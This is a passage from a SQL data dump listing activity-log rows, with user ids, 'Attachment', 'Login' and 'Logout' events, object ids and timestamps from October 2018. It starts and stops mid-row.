06:42:18',NULL),(6465,2,'Attachment',181,'2018-10-03 10:20:06','2018-10-03 10:20:06',NULL),(6466,2,'Attachment',288,'2018-10-03 12:20:06','2018-10-03 12:20:06',NULL),(6467,2,'Attachment',329,'2018-10-03 12:31:01','2018-10-03 12:31:01',NULL),(6468,2,'Attachment',278,'2018-10-03 16:41:56','2018-10-03 16:41:56',NULL),(6469,2,'Attachment',278,'2018-10-04 00:17:05','2018-10-04 00:17:05',NULL),(6470,2,'Attachment',298,'2018-10-04 00:17:22','2018-10-04 00:17:22',NULL),(6471,2,'Attachment',278,'2018-10-04 12:53:18','2018-10-04 12:53:18',NULL),(6472,2,'Attachment',252,'2018-10-07 17:28:31','2018-10-07 17:28:31',NULL),(6473,2,'Attachment',266,'2018-10-07 17:28:32','2018-10-07 17:28:32',NULL),(6474,2,'Attachment',288,'2018-10-07 17:28:32','2018-10-07 17:28:32',NULL),(6475,2,'Attachment',181,'2018-10-07 17:28:32','2018-10-07 17:28:32',NULL),(6476,2,'Attachment',180,'2018-10-07 17:28:32','2018-10-07 17:28:32',NULL),(6477,2,'Attachment',152,'2018-10-07 17:28:33','2018-10-07 17:28:33',NULL),(6478,2,'Attachment',329,'2018-10-07 17:28:34','2018-10-07 17:28:34',NULL),(6479,10,'Login',10,'2018-10-07 17:28:52','2018-10-07 17:28:52',NULL),(6480,2,'Attachment',277,'2018-10-09 01:08:14','2018-10-09 01:08:14',NULL),(6481,2,'Attachment',150,'2018-10-09 09:47:47','2018-10-09 09:47:47',NULL),(6482,2,'Attachment',148,'2018-10-09 09:48:00','2018-10-09 09:48:00',NULL),(6483,2,'Attachment',151,'2018-10-09 09:56:50','2018-10-09 09:56:50',NULL),(6484,2,'Attachment',210,'2018-10-09 10:06:34','2018-10-09 10:06:34',NULL),(6485,2,'Attachment',212,'2018-10-09 10:36:44','2018-10-09 10:36:44',NULL),(6486,2,'Attachment',203,'2018-10-09 10:57:33','2018-10-09 10:57:33',NULL),(6487,2,'Attachment',205,'2018-10-09 10:57:44','2018-10-09 10:57:44',NULL),(6488,2,'Attachment',206,'2018-10-09 11:17:14','2018-10-09 11:17:14',NULL),(6489,2,'Attachment',213,'2018-10-09 11:37:47','2018-10-09 11:37:47',NULL),(6490,2,'Attachment',208,'2018-10-09 11:37:49','2018-10-09 11:37:49',NULL),(6491,2,'Attachment',214,'2018-10-09 11:47:15','2018-10-09 11:47:15',NULL),(6492,2,'Attachment',254,'2018-10-09 11:47:18','2018-10-09 11:47:18',NULL),(6493,2,'Attachment',260,'2018-10-09 11:49:29','2018-10-09 11:49:29',NULL),(6494,2,'Attachment',262,'2018-10-09 11:57:03','2018-10-09 11:57:03',NULL),(6495,2,'Attachment',261,'2018-10-09 11:57:04','2018-10-09 11:57:04',NULL),(6496,2,'Attachment',263,'2018-10-09 11:58:44','2018-10-09 11:58:44',NULL),(6497,2,'Attachment',264,'2018-10-09 12:00:41','2018-10-09 12:00:41',NULL),(6498,2,'Attachment',265,'2018-10-09 12:06:55','2018-10-09 12:06:55',NULL),(6499,2,'Attachment',277,'2018-10-09 12:07:32','2018-10-09 12:07:32',NULL),(6500,2,'Attachment',281,'2018-10-09 12:08:39','2018-10-09 12:08:39',NULL),(6501,2,'Attachment',282,'2018-10-09 12:10:24','2018-10-09 12:10:24',NULL),(6502,2,'Attachment',287,'2018-10-09 12:17:04','2018-10-09 12:17:04',NULL),(6503,2,'Attachment',286,'2018-10-09 12:17:05','2018-10-09 12:17:05',NULL),(6504,2,'Attachment',314,'2018-10-09 12:20:01','2018-10-09 12:20:01',NULL),(6505,2,'Attachment',315,'2018-10-09 12:21:18','2018-10-09 12:21:18',NULL),(6506,2,'Attachment',316,'2018-10-09 12:27:39','2018-10-09 12:27:39',NULL),(6507,2,'Attachment',319,'2018-10-09 12:27:48','2018-10-09 12:27:48',NULL),(6508,2,'Attachment',316,'2018-10-09 12:28:04','2018-10-09 12:28:04',NULL),(6509,2,'Attachment',321,'2018-10-09 12:29:46','2018-10-09 12:29:46',NULL),(6510,2,'Attachment',321,'2018-10-09 12:29:54','2018-10-09 12:29:54',NULL),(6511,2,'Attachment',322,'2018-10-09 12:31:47','2018-10-09 12:31:47',NULL),(6512,2,'Attachment',325,'2018-10-09 12:36:53','2018-10-09 12:36:53',NULL),(6513,2,'Attachment',326,'2018-10-09 12:37:00','2018-10-09 12:37:00',NULL),(6514,2,'Attachment',327,'2018-10-09 12:38:24','2018-10-09 12:38:24',NULL),(6515,2,'Attachment',253,'2018-10-09 14:31:27','2018-10-09 14:31:27',NULL),(6516,2,'Attachment',267,'2018-10-09 14:40:38','2018-10-09 14:40:38',NULL),(6517,2,'Attachment',255,'2018-10-09 14:42:53','2018-10-09 14:42:53',NULL),(6518,2,'Attachment',256,'2018-10-09 14:48:27','2018-10-09 14:48:27',NULL),(6519,2,'Attachment',284,'2018-10-09 14:50:35','2018-10-09 14:50:35',NULL),(6520,2,'Attachment',324,'2018-10-09 14:51:31','2018-10-09 14:51:31',NULL),(6521,2,'Attachment',317,'2018-10-09 14:52:43','2018-10-09 14:52:43',NULL),(6522,2,'Attachment',320,'2018-10-09 15:02:09','2018-10-09 15:02:09',NULL),(6523,2,'Attachment',106,'2018-10-09 15:07:16','2018-10-09 15:07:16',NULL),(6524,2,'Attachment',106,'2018-10-09 15:07:17','2018-10-09 15:07:17',NULL),(6525,2,'Attachment',211,'2018-10-09 15:09:57','2018-10-09 15:09:57',NULL),(6526,2,'Attachment',259,'2018-10-09 15:13:39','2018-10-09 15:13:39',NULL),(6527,2,'Attachment',207,'2018-10-09 23:38:24','2018-10-09 23:38:24',NULL),(6528,2,'Attachment',285,'2018-10-10 00:08:05','2018-10-10 00:08:05',NULL),(6529,2,'Attachment',179,'2018-10-10 00:19:13','2018-10-10 00:19:13',NULL),(6530,2,'Attachment',252,'2018-10-10 03:02:33','2018-10-10 03:02:33',NULL),(6531,2,'Attachment',329,'2018-10-10 08:59:41','2018-10-10 08:59:41',NULL),(6532,2,'Attachment',152,'2018-10-10 08:59:41','2018-10-10 08:59:41',NULL),(6533,1,'Attachment',266,'2018-10-10 09:19:08','2018-10-10 09:19:08',NULL),(6534,1,'Attachment',181,'2018-10-10 09:19:08','2018-10-10 09:19:08',NULL),(6535,1,'Attachment',252,'2018-10-10 09:19:08','2018-10-10 09:19:08',NULL),(6536,1,'Attachment',288,'2018-10-10 09:19:08','2018-10-10 09:19:08',NULL),(6537,1,'Attachment',180,'2018-10-10 09:19:08','2018-10-10 09:19:08',NULL),(6538,1,'Attachment',329,'2018-10-10 09:19:09','2018-10-10 09:19:09',NULL),(6539,1,'Attachment',152,'2018-10-10 09:19:09','2018-10-10 09:19:09',NULL),(6540,1,'Attachment',178,'2018-10-10 09:19:29','2018-10-10 09:19:29',NULL),(6541,1,'Attachment',294,'2018-10-10 09:19:29','2018-10-10 09:19:29',NULL),(6542,1,'Attachment',290,'2018-10-10 09:19:29','2018-10-10 09:19:29',NULL),(6543,1,'Attachment',174,'2018-10-10 09:19:29','2018-10-10 09:19:29',NULL),(6544,1,'Attachment',105,'2018-10-10 09:19:29','2018-10-10 09:19:29',NULL),(6545,1,'Attachment',180,'2018-10-10 09:20:13','2018-10-10 09:20:13',NULL),(6546,1,'Attachment',266,'2018-10-10 09:20:13','2018-10-10 09:20:13',NULL),(6547,1,'Attachment',288,'2018-10-10 09:20:14','2018-10-10 09:20:14',NULL),(6548,1,'Attachment',181,'2018-10-10 09:20:14','2018-10-10 09:20:14',NULL),(6549,1,'Logout',1,'2018-10-10 09:22:49','2018-10-10 09:22:49',NULL),(6550,2,'Attachment',288,'2018-10-10 09:22:49','2018-10-10 09:22:49',NULL),(6551,2,'Attachment',266,'2018-10-10 09:22:49','2018-10-10 09:22:49',NULL),(6552,2,'Attachment',180,'2018-10-10 09:22:50','2018-10-10 09:22:50',NULL),(6553,2,'Attachment',181,'2018-10-10 09:22:50','2018-10-10 09:22:50',NULL),(6554,1,'Login',1,'2018-10-10 09:26:14','2018-10-10 09:26:14',NULL),(6555,1,'Logout',1,'2018-10-10 09:27:00','2018-10-10 09:27:00',NULL),(6556,2,'Attachment',180,'2018-10-10 09:27:00','2018-10-10 09:27:00',NULL),(6557,2,'Attachment',288,'2018-10-10 09:27:00','2018-10-10 09:27:00',NULL),(6558,2,'Attachment',266,'2018-10-10 09:27:00','2018-10-10 09:27:00',NULL),(6559,2,'Attachment',181,'2018-10-10 09:27:00','2018-10-10 09:27:00',NULL),(6560,16,'Attachment',181,'2018-10-10 09:30:45','2018-10-10 09:30:45',NULL),(6561,16,'Attachment',266,'2018-10-10 09:30:45','2018-10-10 09:30:45',NULL),(6562,16,'Attachment',288,'2018-10-10 09:30:45','2018-10-10 09:30:45',NULL),(6563,16,'Attachment',180,'2018-10-10 09:30:45','2018-10-10 09:30:45',NULL),(6564,16,'Logout',16,'2018-10-10 09:30:53','2018-10-10 09:30:53',NULL),(6565,2,'Attachment',288,'2018-10-10 09:30:53','2018-10-10 09:30:53',NULL),(6566,2,'Attachment',181,'2018-10-10 09:30:53','2018-10-10 09:30:53',NULL),(6567,2,'Attachment',180,'2018-10-10 09:30:53','2018-10-10 09:30:53',NULL),(6568,2,'Attachment',266,'2018-10-10 09:33:36','2018-10-10 09:33:36',NULL),(6569,2,'Attachment',288,'2018-10-10 09:33:36','2018-10-10 09:33:36',NULL),(6570,2,'Attachment',180,'2018-10-10 09:33:36','2018-10-10 09:33:36',NULL),(6571,2,'Attachment',181,'2018-10-10 09:33:36','2018-10-10 09:33:36',NULL),(6572,1,'Login',1,'2018-10-10 09:33:39','2018-10-10 09:33:39',NULL),(6573,1,'Logout',1,'2018-10-10 09:44:45','2018-10-10 09:44:45',NULL),(6574,2,'Attachment',288,'2018-10-10 09:44:45','2018-10-10 09:44:45',NULL),(6575,2,'Attachment',266,'2018-10-10 09:44:45','2018-10-10 09:44:45',NULL),(6576,2,'Attachment',181,'2018-10-10 09:44:45','2018-10-10 09:44:45',NULL),(6577,2,'Attachment',180,'2018-10-10 09:44:45','2018-10-10 09:44:45',NULL),(6578,5,'Login',5,'2018-10-10 09:44:49','2018-10-10 09:44:49',NULL),(6579,5,'Attachment',181,'2018-10-10 09:49:33','2018-10-10 09:49:33',NULL),(6580,5,'Attachment',266,'2018-10-10 09:49:33','2018-10-10 09:49:33',NULL),(6581,5,'Attachment',288,'2018-10-10 09:49:33','2018-10-10 09:49:33',NULL),(6582,5,'Attachment',180,'2018-10-10 09:49:33','2018-10-10 09:49:33',NULL),(6583,5,'Logout',5,'2018-10-10 09:49:58','2018-10-10 09:49:58',NULL),(6584,2,'Attachment',288,'2018-10-10 09:49:59','2018-10-10 09:49:59',NULL),(6585,2,'Attachment',181,'2018-10-10 09:49:59','2018-10-10 09:49:59',NULL),(6586,2,'Attachment',180,'2018-10-10 09:49:59','2018-10-10 09:49:59',NULL),(6587,2,'Attachment',266,'2018-10-10 09:49:59','2018-10-10 09:49:59',NULL),(6588,1,'Login',1,'2018-10-10 09:50:02','2018-10-10 09:50:02',NULL),(6589,1,'Attachment',288,'2018-10-10 09:53:12','2018-10-10 09:53:12',NULL),(6590,1,'Attachment',178,'2018-10-10 09:53:49','2018-10-10 09:53:49',NULL),(6591,1,'Attachment',290,'2018-10-10 09:53:49','2018-10-10 09:53:49',NULL),(6592,1,'Attachment',174,'2018-10-10 09:53:49','2018-10-10 09:53:49',NULL),(6593,1,'Attachment',288,'2018-10-10 10:16:54','2018-10-10 10:16:54',NULL),(6594,1,'Attachment',180,'2018-10-10 10:16:54','2018-10-10 10:16:54',NULL),(6595,1,'Attachment',181,'2018-10-10 10:16:54','2018-10-10 10:16:54',NULL),(6596,1,'Attachment',266,'2018-10-10 10:16:54','2018-10-10 10:16:54',NULL),(6597,2,'Attachment',209,'2018-10-10 10:39:03','2018-10-10 10:39:03',NULL),(6598,1,'Attachment',205,'2018-10-10 14:43:26','2018-10-10 14:43:26',NULL),(6599,1,'Attachment',203,'2018-10-10 14:43:26','2018-10-10 14:43:26',NULL),(6600,1,'Attachment',204,'2018-10-10 14:43:26','2018-10-10 14:43:26',NULL),(6601,1,'Attachment',208,'2018-10-10 14:43:26','2018-10-10 14:43:26',NULL),(6602,1,'Attachment',206,'2018-10-10 14:43:26','2018-10-10 14:43:26',NULL),(6603,1,'Attachment',207,'2018-10-10 14:43:26','2018-10-10 14:43:26',NULL),(6604,1,'Attachment',209,'2018-10-10 14:43:28','2018-10-10 14:43:28',NULL),(6605,1,'Attachment',210,'2018-10-10 14:43:28','2018-10-10 14:43:28',NULL),(6606,1,'Attachment',211,'2018-10-10 14:43:28','2018-10-10 14:43:28',NULL),(6607,1,'Attachment',212,'2018-10-10 14:43:29','2018-10-10 14:43:29',NULL),(6608,1,'Attachment',213,'2018-10-10 14:43:29','2018-10-10 14:43:29',NULL),(6609,1,'Attachment',214,'2018-10-10 14:43:30','2018-10-10 14:43:30',NULL),(6610,1,'Attachment',266,'2018-10-10 15:06:45','2018-10-10 15:06:45',NULL),(6611,1,'Attachment',288,'2018-10-10 15:06:45','2018-10-10 15:06:45',NULL),(6612,1,'Attachment',181,'2018-10-10 15:06:45','2018-10-10 15:06:45',NULL),(6613,1,'Attachment',180,'2018-10-10 15:06:45','2018-10-10 15:06:45',NULL),(6614,1,'Attachment',259,'2018-10-10 15:09:24','2018-10-10 15:09:24',NULL),(6615,1,'Attachment',262,'2018-10-10 15:09:24','2018-10-10 15:09:24',NULL),(6616,1,'Attachment',261,'2018-10-10 15:09:24','2018-10-10 15:09:24',NULL),(6617,1,'Attachment',267,'2018-10-10 15:09:24','2018-10-10 15:09:24',NULL),(6618,1,'Attachment',260,'2018-10-10 15:09:24','2018-10-10 15:09:24',NULL),(6619,1,'Attachment',263,'2018-10-10 15:09:24','2018-10-10 15:09:24',NULL),(6620,1,'Attachment',264,'2018-10-10 15:09:25','2018-10-10 15:09:25',NULL),(6621,1,'Attachment',265,'2018-10-10 15:09:25','2018-10-10 15:09:25',NULL),(6622,2,'Attachment',323,'2018-10-10 21:38:09','2018-10-10 21:38:09',NULL),(6623,2,'Attachment',204,'2018-10-11 08:22:39','2018-10-11 08:22:39',NULL),(6624,2,'Attachment',252,'2018-10-11 09:47:03','2018-10-11 09:47:03',NULL),(6625,2,'Attachment',181,'2018-10-11 09:47:03','2018-10-11 09:47:03',NULL),(6626,2,'Attachment',180,'2018-10-11 09:47:03','2018-10-11 09:47:03',NULL),(6627,2,'Attachment',288,'2018-10-11 09:47:03','2018-10-11 09:47:03',NULL),(6628,2,'Attachment',266,'2018-10-11 09:47:03','2018-10-11 09:47:03',NULL),(6629,2,'Attachment',152,'2018-10-11 09:47:03','2018-10-11 09:47:03',NULL),(6630,2,'Attachment',329,'2018-10-11 09:47:04','2018-10-11 09:47:04',NULL),(6631,2,'Attachment',178,'2018-10-11 09:47:15','2018-10-11 09:47:15',NULL),(6632,2,'Attachment',290,'2018-10-11 09:47:15','2018-10-11 09:47:15',NULL),(6633,2,'Attachment',294,'2018-10-11 09:47:15','2018-10-11 09:47:15',NULL),(6634,2,'Attachment',105,'2018-10-11 09:47:15','2018-10-11 09:47:15',NULL),(6635,2,'Attachment',174,'2018-10-11 09:47:15','2018-10-11 09:47:15',NULL),(6636,2,'Attachment',50,'2018-10-11 09:47:16','2018-10-11 09:47:16',NULL),(6637,2,'Attachment',49,'2018-10-11 09:47:16','2018-10-11 09:47:16',NULL),(6638,2,'Attachment',280,'2018-10-11 09:47:17','2018-10-11 09:47:17',NULL),(6639,2,'Attachment',274,'2018-10-11 09:47:17','2018-10-11 09:47:17',NULL),(6640,1,'Login',1,'2018-10-11 10:46:08','2018-10-11 10:46:08',NULL),(6641,1,'Attachment',49,'2018-10-11 10:46:42','2018-10-11 10:46:42',NULL),(6642,1,'Attachment',277,'2018-10-11 10:47:03','2018-10-11 10:47:03',NULL),(6643,1,'Attachment',278,'2018-10-11 10:47:45','2018-10-11 10:47:45',NULL),(6644,1,'Attachment',298,'2018-10-11 10:47:50','2018-10-11 10:47:50',NULL),(6645,1,'Attachment',330,'2018-10-11 10:49:51','2018-10-11 10:49:51',NULL),(6646,1,'Attachment',332,'2018-10-11 10:55:35','2018-10-11 10:55:35',NULL),(6647,1,'Attachment',333,'2018-10-11 10:58:36','2018-10-11 10:58:36',NULL),(6648,1,'Attachment',335,'2018-10-11 10:59:14','2018-10-11 10:59:14',NULL),(6649,1,'Attachment',280,'2018-10-11 10:59:29','2018-10-11 10:59:29',NULL),(6650,1,'Attachment',274,'2018-10-11 11:00:07','2018-10-11 11:00:07',NULL),(6651,1,'Attachment',292,'2018-10-11 11:00:54','2018-10-11 11:00:54',NULL),(6652,1,'Attachment',290,'2018-10-11 11:01:00','2018-10-11 11:01:00',NULL),(6653,1,'Attachment',293,'2018-10-11 11:01:20','2018-10-11 11:01:20',NULL),(6654,1,'Attachment',294,'2018-10-11 11:01:23','2018-10-11 11:01:23',NULL),(6655,1,'Attachment',50,'2018-10-11 11:02:34','2018-10-11 11:02:34',NULL),(6656,1,'Attachment',331,'2018-10-11 11:05:27','2018-10-11 11:05:27',NULL),(6657,1,'Attachment',331,'2018-10-11 11:06:43','2018-10-11 11:06:43',NULL),(6658,2,'Attachment',266,'2018-10-11 11:14:39','2018-10-11 11:14:39',NULL),(6659,2,'Attachment',252,'2018-10-11 11:14:39','2018-10-11 11:14:39',NULL),(6660,2,'Attachment',181,'2018-10-11 11:14:39','2018-10-11 11:14:39',NULL),(6661,2,'Attachment',329,'2018-10-11 11:14:39','2018-10-11 11:14:39',NULL),(6662,2,'Attachment',180,'2018-10-11 11:14:39','2018-10-11 11:14:39',NULL),(6663,2,'Attachment',288,'2018-10-11 11:14:40','2018-10-11 11:14:40',NULL),(6664,2,'Attachment',152,'2018-10-11 11:14:40','2018-10-11 11:14:40',NULL),(6665,2,'Attachment',202,'2018-10-11 11:14:43','2018-10-11 11:14:43',NULL),(6666,2,'Attachment',294,'2018-10-11 11:14:43','2018-10-11 11:14:43',NULL),(6667,2,'Attachment',290,'2018-10-11 11:14:43','2018-10-11 11:14:43',NULL),(6668,2,'Attachment',178,'2018-10-11 11:14:43','2018-10-11 11:14:43',NULL),(6669,2,'Attachment',174,'2018-10-11 11:14:43','2018-10-11 11:14:43',NULL),(6670,2,'Attachment',335,'2018-10-11 11:14:46','2018-10-11 11:14:46',NULL),(6671,2,'Attachment',50,'2018-10-11 11:14:46','2018-10-11 11:14:46',NULL),(6672,2,'Attachment',274,'2018-10-11 11:14:46','2018-10-11 11:14:46',NULL),(6673,2,'Attachment',280,'2018-10-11 11:14:46','2018-10-11 11:14:46',NULL),(6674,2,'Attachment',49,'2018-10-11 11:14:46','2018-10-11 11:14:46',NULL),(6675,2,'Attachment',179,'2018-10-11 11:15:14','2018-10-11 11:15:14',NULL),(6676,2,'Attachment',277,'2018-10-11 11:15:22','2018-10-11 11:15:22',NULL),(6677,2,'Attachment',297,'2018-10-11 11:15:25','2018-10-11 11:15:25',NULL),(6678,2,'Attachment',332,'2018-10-11 11:16:27','2018-10-11 11:16:27',NULL),(6679,2,'Attachment',288,'2018-10-11 11:19:48','2018-10-11 11:19:48',NULL),(6680,2,'Attachment',252,'2018-10-11 11:19:48','2018-10-11 11:19:48',NULL),(6681,2,'Attachment',181,'2018-10-11 11:19:48','2018-10-11 11:19:48',NULL),(6682,2,'Attachment',180,'2018-10-11 11:19:48','2018-10-11 11:19:48',NULL),(6683,2,'Attachment',266,'2018-10-11 11:19:48','2018-10-11 11:19:48',NULL),(6684,2,'Attachment',152,'2018-10-11 11:19:48','2018-10-11 11:19:48',NULL),(6685,2,'Attachment',329,'2018-10-11 11:19:49','2018-10-11 11:19:49',NULL),(6686,2,'Attachment',28,'2018-10-11 11:24:27','2018-10-11 11:24:27',NULL),(6687,2,'Attachment',57,'2018-10-11 11:24:27','2018-10-11 11:24:27',NULL),(6688,2,'Attachment',278,'2018-10-11 11:24:34','2018-10-11 11:24:34',NULL),(6689,2,'Attachment',105,'2018-10-11 11:27:59','2018-10-11 11:27:59',NULL),(6690,2,'Attachment',69,'2018-10-11 11:27:59','2018-10-11 11:27:59',NULL),(6691,2,'Attachment',216,'2018-10-11 11:27:59','2018-10-11 11:27:59',NULL),(6692,2,'Attachment',25,'2018-10-11 11:27:59','2018-10-11 11:27:59',NULL),(6693,2,'Attachment',38,'2018-10-11 11:27:59','2018-10-11 11:27:59',NULL),(6694,2,'Attachment',14,'2018-10-11 11:27:59','2018-10-11 11:27:59',NULL),(6695,2,'Attachment',26,'2018-10-11 11:27:59','2018-10-11 11:27:59',NULL),(6696,2,'Attachment',329,'2018-10-11 11:36:37','2018-10-11 11:36:37',NULL),(6697,2,'Attachment',252,'2018-10-11 11:43:13','2018-10-11 11:43:13',NULL),(6698,2,'Attachment',152,'2018-10-11 11:43:13','2018-10-11 11:43:13',NULL),(6699,2,'Attachment',180,'2018-10-11 11:43:13','2018-10-11 11:43:13',NULL),(6700,2,'Attachment',181,'2018-10-11 11:43:13','2018-10-11 11:43:13',NULL),(6701,2,'Attachment',266,'2018-10-11 11:43:13','2018-10-11 11:43:13',NULL),(6702,2,'Attachment',288,'2018-10-11 11:43:13','2018-10-11 11:43:13',NULL),(6703,2,'Attachment',329,'2018-10-11 11:43:14','2018-10-11 11:43:14',NULL),(6704,2,'Attachment',29,'2018-10-11 11:43:20','2018-10-11 11:43:20',NULL),(6705,2,'Attachment',14,'2018-10-11 11:43:20','2018-10-11 11:43:20',NULL),(6706,2,'Attachment',36,'2018-10-11 11:43:20','2018-10-11 11:43:20',NULL),(6707,2,'Attachment',69,'2018-10-11 11:43:20','2018-10-11 11:43:20',NULL),(6708,2,'Attachment',178,'2018-10-11 11:43:24','2018-10-11 11:43:24',NULL),(6709,2,'Attachment',105,'2018-10-11 11:43:24','2018-10-11 11:43:24',NULL),(6710,2,'Attachment',28,'2018-10-11 11:43:27','2018-10-11 11:43:27',NULL),(6711,2,'Attachment',57,'2018-10-11 11:43:27','2018-10-11 11:43:27',NULL),(6712,2,'Attachment',280,'2018-10-11 11:43:29','2018-10-11 11:43:29',NULL),(6713,2,'Attachment',274,'2018-10-11 11:43:29','2018-10-11 11:43:29',NULL),(6714,2,'Attachment',290,'2018-10-11 11:43:29','2018-10-11 11:43:29',NULL),(6715,2,'Attachment',49,'2018-10-11 11:43:29','2018-10-11 11:43:29',NULL),(6716,2,'Attachment',50,'2018-10-11 11:43:29','2018-10-11 11:43:29',NULL),(6717,2,'Attachment',335,'2018-10-11 11:43:29','2018-10-11 11:43:29',NULL),(6718,2,'Attachment',294,'2018-10-11 11:43:29','2018-10-11 11:43:29',NULL),(6719,2,'Attachment',333,'2018-10-11 11:43:45','2018-10-11 11:43:45',NULL),(6720,2,'Attachment',283,'2018-10-11 13:41:57','2018-10-11 13:41:57',NULL),(6721,2,'Attachment',266,'2018-10-11 15:00:14','2018-10-11 15:00:14',NULL),(6722,2,'Attachment',181,'2018-10-11 15:00:14','2018-10-11 15:00:14',NULL),(6723,2,'Attachment',288,'2018-10-11 15:00:14','2018-10-11 15:00:14',NULL),(6724,2,'Attachment',252,'2018-10-11 15:00:14','2018-10-11 15:00:14',NULL),(6725,2,'Attachment',180,'2018-10-11 15:00:15','2018-10-11 15:00:15',NULL),(6726,2,'Attachment',329,'2018-10-11 15:00:16','2018-10-11 15:00:16',NULL),(6727,2,'Attachment',252,'2018-10-11 15:09:29','2018-10-11 15:09:29',NULL),(6728,2,'Attachment',266,'2018-10-11 15:09:29','2018-10-11 15:09:29',NULL),(6729,2,'Attachment',181,'2018-10-11 15:09:29','2018-10-11 15:09:29',NULL),(6730,2,'Attachment',152,'2018-10-11 15:09:29','2018-10-11 15:09:29',NULL),(6731,2,'Attachment',329,'2018-10-11 15:09:30','2018-10-11 15:09:30',NULL),(6732,1,'Attachment',202,'2018-10-11 17:12:52','2018-10-11 17:12:52',NULL),(6733,1,'Attachment',69,'2018-10-11 17:12:53','2018-10-11 17:12:53',NULL),(6734,1,'Attachment',216,'2018-10-11 17:12:53','2018-10-11 17:12:53',NULL),(6735,1,'Attachment',38,'2018-10-11 17:12:53','2018-10-11 17:12:53',NULL),(6736,1,'Attachment',57,'2018-10-11 17:12:53','2018-10-11 17:12:53',NULL),(6737,1,'Attachment',25,'2018-10-11 17:12:53','2018-10-11 17:12:53',NULL),(6738,1,'Attachment',14,'2018-10-11 17:12:53','2018-10-11 17:12:53',NULL),(6739,1,'Attachment',26,'2018-10-11 17:12:53','2018-10-11 17:12:53',NULL),(6740,2,'Attachment',181,'2018-10-12 17:22:31','2018-10-12 17:22:31',NULL),(6741,2,'Attachment',252,'2018-10-12 17:22:31','2018-10-12 17:22:31',NULL),(6742,2,'Attachment',180,'2018-10-12 17:22:31','2018-10-12 17:22:31',NULL),(6743,2,'Attachment',288,'2018-10-12 17:22:31','2018-10-12 17:22:31',NULL),(6744,2,'Attachment',266,'2018-10-12 17:22:31','2018-10-12 17:22:31',NULL),(6745,2,'Attachment',329,'2018-10-12 17:22:31','2018-10-12 17:22:31',NULL),(6746,2,'Attachment',152,'2018-10-12 17:22:31','2018-10-12 17:22:31',NULL),(6747,2,'Attachment',178,'2018-10-12 17:22:35','2018-10-12 17:22:35',NULL),(6748,2,'Attachment',290,'2018-10-12 17:22:35','2018-10-12 17:22:35',NULL),(6749,2,'Attachment',202,'2018-10-12 17:22:35','2018-10-12 17:22:35',NULL),(6750,2,'Attachment',294,'2018-10-12 17:22:35','2018-10-12 17:22:35',NULL),(6751,2,'Attachment',174,'2018-10-12 17:22:35','2018-10-12 17:22:35',NULL),(6752,2,'Attachment',36,'2018-10-12 17:25:32','2018-10-12 17:25:32',NULL),(6753,2,'Attachment',69,'2018-10-12 17:25:32','2018-10-12 17:25:32',NULL),(6754,2,'Attachment',14,'2018-10-12 17:25:32','2018-10-12 17:25:32',NULL),(6755,2,'Attachment',29,'2018-10-12 17:25:32','2018-10-12 17:25:32',NULL),(6756,2,'Attachment',105,'2018-10-12 17:25:33','2018-10-12 17:25:33',NULL),(6757,2,'Attachment',57,'2018-10-12 17:25:34','2018-10-12 17:25:34',NULL),(6758,2,'Attachment',28,'2018-10-12 17:25:34','2018-10-12 17:25:34',NULL),(6759,2,'Attachment',335,'2018-10-12 17:25:35','2018-10-12 17:25:35',NULL),(6760,2,'Attachment',280,'2018-10-12 17:25:35','2018-10-12 17:25:35',NULL),(6761,2,'Attachment',49,'2018-10-12 17:25:35','2018-10-12 17:25:35',NULL),(6762,2,'Attachment',274,'2018-10-12 17:25:35','2018-10-12 17:25:35',NULL),(6763,2,'Attachment',50,'2018-10-12 17:25:35','2018-10-12 17:25:35',NULL),(6764,2,'Attachment',252,'2018-10-12 17:28:44','2018-10-12 17:28:44',NULL),(6765,2,'Attachment',288,'2018-10-12 17:28:44','2018-10-12 17:28:44',NULL),(6766,2,'Attachment',266,'2018-10-12 17:28:44','2018-10-12 17:28:44',NULL),(6767,2,'Attachment',181,'2018-10-12 17:28:44','2018-10-12 17:28:44',NULL),(6768,2,'Attachment',180,'2018-10-12 17:28:44','2018-10-12 17:28:44',NULL),(6769,2,'Attachment',152,'2018-10-12 17:28:45','2018-10-12 17:28:45',NULL),(6770,2,'Attachment',329,'2018-10-12 17:28:45','2018-10-12 17:28:45',NULL),(6771,2,'Attachment',202,'2018-10-12 17:28:49','2018-10-12 17:28:49',NULL),(6772,2,'Attachment',294,'2018-10-12 17:28:49','2018-10-12 17:28:49',NULL),(6773,2,'Attachment',290,'2018-10-12 17:28:49','2018-10-12 17:28:49',NULL),(6774,2,'Attachment',178,'2018-10-12 17:28:49','2018-10-12 17:28:49',NULL),(6775,2,'Attachment',174,'2018-10-12 17:28:49','2018-10-12 17:28:49',NULL),(6776,2,'Attachment',314,'2018-10-12 17:29:37','2018-10-12 17:29:37',NULL),(6777,2,'Attachment',317,'2018-10-12 17:29:37','2018-10-12 17:29:37',NULL),(6778,2,'Attachment',316,'2018-10-12 17:29:37','2018-10-12 17:29:37',NULL),(6779,2,'Attachment',315,'2018-10-12 17:29:37','2018-10-12 17:29:37',NULL),(6780,2,'Attachment',318,'2018-10-12 17:29:42','2018-10-12 17:29:42',NULL),(6781,2,'Attachment',319,'2018-10-12 17:29:42','2018-10-12 17:29:42',NULL),(6782,2,'Attachment',320,'2018-10-12 17:29:45','2018-10-12 17:29:45',NULL),(6783,2,'Attachment',321,'2018-10-12 17:29:46','2018-10-12 17:29:46',NULL),(6784,2,'Attachment',322,'2018-10-12 17:29:50','2018-10-12 17:29:50',NULL),(6785,2,'Attachment',323,'2018-10-12 17:29:52','2018-10-12 17:29:52',NULL),(6786,2,'Attachment',324,'2018-10-12 17:29:54','2018-10-12 17:29:54',NULL),(6787,2,'Attachment',325,'2018-10-12 17:29:57','2018-10-12 17:29:57',NULL),(6788,2,'Attachment',326,'2018-10-12 17:29:59','2018-10-12 17:29:59',NULL),(6789,2,'Attachment',327,'2018-10-12 17:30:00','2018-10-12 17:30:00',NULL),(6790,2,'Attachment',252,'2018-10-12 17:31:08','2018-10-12 17:31:08',NULL),(6791,2,'Attachment',288,'2018-10-12 17:31:08','2018-10-12 17:31:08',NULL),(6792,2,'Attachment',266,'2018-10-12 17:31:08','2018-10-12 17:31:08',NULL),(6793,2,'Attachment',181,'2018-10-12 17:31:08','2018-10-12 17:31:08',NULL),(6794,2,'Attachment',180,'2018-10-12 17:31:08','2018-10-12 17:31:08',NULL),(6795,2,'Attachment',152,'2018-10-12 17:31:08','2018-10-12 17:31:08',NULL),(6796,2,'Attachment',329,'2018-10-12 17:31:09','2018-10-12 17:31:09',NULL),(6797,2,'Attachment',181,'2018-10-12 17:32:13','2018-10-12 17:32:13',NULL),(6798,2,'Attachment',252,'2018-10-12 